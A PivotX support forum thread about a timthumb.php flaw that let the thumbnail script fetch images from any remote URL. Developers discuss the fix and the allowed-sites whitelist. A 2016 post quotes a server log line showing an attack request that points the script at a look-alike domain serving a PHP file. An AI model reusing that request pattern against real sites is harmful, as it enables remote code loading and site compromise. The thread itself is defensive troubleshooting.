Security: timthumb.php allows cross-site access by default

This is the place to discuss bugs that have been found in the most recent version of PivotX. Posting bugs will ensure that the Development Team is aware of them and that they will be addressed when resources are available.

Security: timthumb.php allows cross-site access by default

Postby mskala » Sun May 23, 2010 2:47 pm

The file pivotx/includes/timthumb.php , which is used for making thumbnails of images, accepts the URL of the image to thumbnail as a query variable. Although the script includes code to check that the specified URL is local, or on a whitelist of allowed URLs, this code is disabled by default. There's a line that says "$allow_remote_all = true;", and as a result, it will accept any URL the user specifies and attempt to download an image from that URL. This could be exploited, for instance, for spamming (the URL could be one that attempts to post a comment to another site); or to attack the local site by attempting to exploit buffer overflows, etc., in the image-parsing library. Downloading remote images this way, if it's ever allowed, certainly shouldn't be allowed by default; and the setting is not user-configurable but hardcoded in the script.
mskala
 
Posts: 10
Joined: Mon Mar 29, 2010 5:40 pm

Re: Security: timthumb.php allows cross-site access by defau

Postby hansfn » Sun May 23, 2010 5:53 pm

Hi and thanks for posting.

I do understand some of your concerns, and I will discuss it with Bob - who just recently enabled/allowed remote images. Unluckily it's not easy to control this using a PivotX config setting since timthumb.php is standalone.

This could be exploited, for instance, for spamming (the URL could be one that attempts to post a comment to another site);

Since timthumb.php does a get request for the image, this is very, very, very unlikely (and you know why). However,

or to attack the local site by attempting to exploit buffer overflows, etc., in the image-parsing library.

is a scary and much more likely problem.
hansfn
Developer
 
Posts: 3280
Joined: Sun Nov 25, 2007 7:48 pm
Location: Molde, Norway

Re: Security: timthumb.php allows cross-site access by defau

Postby hansfn » Tue May 25, 2010 7:19 pm

FYI: We no longer allow remote images by default - changed in revision 2729.
hansfn
Developer
 
Posts: 3280
Joined: Sun Nov 25, 2007 7:48 pm
Location: Molde, Norway

Re: Security: timthumb.php allows cross-site access by defau

Postby scoude » Mon Oct 10, 2011 8:21 am

hansfn wrote:Since timthumb.php does a get request for the image, this is very, very, very unlikely (and you know why). However,


Hi,

I just have a hacker using my site with PivotX using this vulnerability ...

[cut by hansfn]
scoude
 
Posts: 2
Joined: Mon Oct 10, 2011 8:11 am

Re: Security: timthumb.php allows cross-site access by defau

Postby hansfn » Mon Oct 10, 2011 8:38 am

This was fixed in PivotX 2.3.0 - did you upgrade?

If you think a similar bug is present in 2.3.0, contact me directly at hansfn@pivotx.net - never disclose such details openly in the forum. Thx :-)

PS! This is a very old thread and your vulnerability isn't the same as the issue discussed in this thread (even if it's related).
hansfn
Developer
 
Posts: 3280
Joined: Sun Nov 25, 2007 7:48 pm
Location: Molde, Norway

Security: timthumb.php

Postby winters » Fri May 20, 2016 9:04 pm

according to the host I got a problem with

91.227.5.10 - - [17/May/2016:19:39:57 -0400] "GET /pivotx/includes/timthumb.php?src=http%3A%2F%2Fimg.youtube.com.dwell.kz%2Fpetx.php HTTP/1.1" 200 15544 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"

pivotx 2.3.11

does someone know if this can be correct?

thanks!
winters
 
Posts: 82
Joined: Thu Jan 13, 2011 9:09 pm

Re: Security: timthumb.php allows cross-site access by defau

Postby hansfn » Sun May 22, 2016 8:50 pm

No, the default configuration of timthumb.php does not allow fetching from files from img.youtube.com.dwell.kz, only img.youtube.com (and other trusted hosts - see the $ALLOWED_SITES variable).

So, if your host claims that your timthumb.php misbehaves, you have either not updated the file when updating PivotX (it should say "This is timthumb version 2.8.4 - r200" in the beginning of the file) or you have set ALLOW_ALL_EXTERNAL_SITES to true either in timthumb-config.php or in timthumb.php

NB! The fact that some one tries to attack your timthumb.php doesn't prove or say that there is a vulnerability.
hansfn
Developer
 
Posts: 3280
Joined: Sun Nov 25, 2007 7:48 pm
Location: Molde, Norway

Re: Security: timthumb.php allows cross-site access by defau

Postby winters » Mon May 23, 2016 8:29 pm

thank you hans
winters
 
Posts: 82
Joined: Thu Jan 13, 2011 9:09 pm


Return to 2.x Bugs

Who is online

Users browsing this forum: Google [Bot] and 1 guest

cron